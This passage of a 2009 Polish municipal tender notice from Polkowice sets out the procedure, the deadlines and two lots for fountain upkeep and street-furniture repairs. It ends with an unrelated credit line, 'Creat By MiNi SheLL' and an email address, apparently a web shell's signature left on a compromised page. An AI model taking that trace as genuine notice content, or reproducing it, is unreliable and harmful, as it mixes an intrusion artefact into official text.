-	wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia oraz upływu czasu gwarancji i rękojmi,
-	zakaz zmian w umowie bez zgody Zamawiającego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.ug.polkowice.pl/?ID2=przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy, ul. Rynek 1 , 59-100 Polkowice, pok. nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2009 godzina 10:00, miejsce: Urząd Gminy, ul. Rynek 1 , 59-100 Polkowice, Kancelaria - pok. nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remonty małej architektury na terenie gminy - Sektor 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje eksploatację fontann oraz bieżące remonty małej architektury na terenie miasta i gminy Polkowice, polegające na: naprawie, wymianie, montażu lub demontażu elementów małej architektury (ławki, siedziska, elementy urządzeń komunalnych, pergole, ogrodzenia, murki, nawierzchnie, itp.),  w podziale na sektory: 
SEKTOR 1 - osiedle Sienkiewicza, osiedle Centrum, Stare Miasto, osiedle Gwarków (bez Placu Honorowych Dawców Krwi), ul. Spokojna ze ścieżką zdrowia, dawne Polkowice Dolne oraz wsie gminy: Biedrzychowa, Jędrzychów, Sobin , Nowa Wieś Lubińska.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remonty małej architektury na terenie gminy - Sektor 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje eksploatację fontann oraz bieżące remonty małej architektury na terenie miasta i gminy Polkowice, polegające na: naprawie, wymianie, montażu lub demontażu elementów małej architektury (ławki, siedziska, elementy urządzeń komunalnych, pergole, ogrodzenia, murki, nawierzchnie, itp.),  w podziale na sektory: 
SEKTOR 2 - os.  Krupińskiego, Plac Honorowych Dawców Krwi,  tereny pomiędzy  ulicami: Dąbrowskiego, Kolejową i Przemysłową, os. Młodych, os. Polanka, os. Staszica, os. Dąbrowskiego, os. Hubala, Park przy Stadionie Miejskim, oraz wsie gminy: Sucha Górna, Kaźmierzów, Moskorzyn, Żuków, Komorniki, Tarnówek, Guzice, Trzebcz, Dąbrowa, Pieszkowice, Żelazny Most.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com